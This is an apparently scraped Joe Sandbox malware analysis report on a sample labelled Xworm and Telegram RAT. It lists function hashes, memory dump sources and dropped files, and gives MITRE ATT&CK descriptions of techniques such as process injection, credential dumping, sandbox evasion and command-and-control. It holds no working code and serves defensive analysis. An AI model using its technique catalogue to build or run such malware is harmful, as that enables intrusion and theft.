Instruction Fuzzy Hash: 43318860B1954D8FD789EF288CB59A97B72AF8831879044A9D80CC73DFDE3869148761

Function 00007FFD9A8B0B48 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1ba364e33152dd51346399e3eb73a2dc81835c1491c903db299fcde19f69130
Instruction ID: 0a744fffa5de11fa1079fcbced3edcf0e48198f33c69e7594f4cde1aa5be2e7e
Opcode Fuzzy Hash: d1ba364e33152dd51346399e3eb73a2dc81835c1491c903db299fcde19f69130
Instruction Fuzzy Hash: 4D215361F149094BFB44BBBC5C6A6FC72D2EF98615F100176E11DC32DBDE28A8414381

Function 00007FFD9A8B1E61 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d22be257aec1fef2aff7e335eb6026b2bb25983b7294a3e9eec1b7a30b35344
Instruction ID: bf0c70261ba3e64c01ac9d60f555d45e3aa3dfc0707eee9b8d205f298eecfd7b
Opcode Fuzzy Hash: 8d22be257aec1fef2aff7e335eb6026b2bb25983b7294a3e9eec1b7a30b35344
Instruction Fuzzy Hash: 8B012611A1C7854FE796BB3C1C654767FF18F86260B0805BBE888CB1DBED28A94583C2

Non-executed Functions

Function 00007FFD9A8B06FA Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

P_^p, xrefs: 00007FFD9A8B0712
P_^j, xrefs: 00007FFD9A8B06FA
<P_^, xrefs: 00007FFD9A8B0801
=P_^, xrefs: 00007FFD9A8B0701

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID: <P_^$=P_^$P_^j$P_^p
API String ID: 0-44659116
Opcode ID: c2547940b3e967ae60f9395eada9943db0980e8c63c6b4055a7c22d6c5a5fac0
Instruction ID: 5e1585e673de5cbd5fbc2b82699c515abac60ad61b06f3779326ccd3fc8eac5c
Opcode Fuzzy Hash: c2547940b3e967ae60f9395eada9943db0980e8c63c6b4055a7c22d6c5a5fac0
Instruction Fuzzy Hash: 983134D7F4C41259E311BBE92CA26DC3794AF90378B584133C1EC8B1CBCE58744A85DA

Analysis Process: powershell.exePID: 8556, Parent PID: 8392COMMON

Executed Functions

Function 00007FFD9A9A17D9 Relevance: 2.0, Strings: 1, Instructions: 763COMMON

Download Yara Rule

Strings

@ns, xrefs: 00007FFD9A9A19C6

Memory Dump Source

Source File: 00000033.00000002.2022245682.00007FFD9A9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9a9a0000_powershell.jbxd

Similarity

API ID:
String ID: @ns
API String ID: 0-2502002506
Opcode ID: bc74481d40e43a57c91ed41fc5ee343c9cee032a86a635c9f160c09f69ba0ad8
Instruction ID: 8dff54a9336db702bba04d3c2724da2d362683eb236ffe4fb210b7d00b87b409
Opcode Fuzzy Hash: bc74481d40e43a57c91ed41fc5ee343c9cee032a86a635c9f160c09f69ba0ad8
Instruction Fuzzy Hash: 41224823B0EB895FE7AA9B7858641B47BE1EF86324B6801FBD04DC71D7E918AC45C341

Function 00007FFD9A8D43A7 Relevance: 1.0, Instructions: 972COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2020995781.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9a8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582ec4015e148656565802fca0c20a67d83edd059695b92f10bd9d18814bcc9a
Instruction ID: baab56c9e0b2abe6e54c8c6a642fb010ca9ebea6aa451493cdb1ff6bbb6cfab4
Opcode Fuzzy Hash: 582ec4015e148656565802fca0c20a67d83edd059695b92f10bd9d18814bcc9a
Instruction Fuzzy Hash: AAF10973F0E6864FEB159BAC98751E97FB0EF52320B0902FBD489C71A3DD2968068751

Function 00007FFD9A8D45F2 Relevance: .7, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2020995781.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9a8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81ae072efffd8851f4367c64a5e1c68c3bc979309dc78bce1894f9073f9da94
Instruction ID: 985ec36ebc384a2b3af7f24514513048d645c58b6a2003f620c5c3ba46d9311f
Opcode Fuzzy Hash: a81ae072efffd8851f4367c64a5e1c68c3bc979309dc78bce1894f9073f9da94
Instruction Fuzzy Hash: 0861F471E096498FDB58DFACD8556ECBBF1EF4A310F1442AED00DD7292CA35A842CB40

Function 00007FFD9A8D3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2020995781.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9a8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 0909884202c2d8c793c840d1a1558e6ff8ba582b98f23f4b5f840faf0850cf9c
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7C01A73120CB0C4FD748EF0CE451AA5B3E0FB85324F10066DE58AC3695D736E882CB42

Analysis Process: word.exePID: 5288, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9A8F12E9 Relevance: .8, Instructions: 799COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000051.00000002.2012804966.00007FFD9A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_81_2_7ffd9a8f0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a939a16d7107cb057d8037210f216452a59d658ab99de347d4e8063055b2d05b
Instruction ID: 84d316cdc90fccec2e5ce14af445c795a67ccfdaac967db052824e790b023e28
Opcode Fuzzy Hash: a939a16d7107cb057d8037210f216452a59d658ab99de347d4e8063055b2d05b
Instruction Fuzzy Hash: 32428761F28A4A4FE798EB6C8875679B7D2FF98314F54057DE04EC32DADE286C018781

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sB2ClgrGng.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Windows Analysis Report
sB2ClgrGng.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre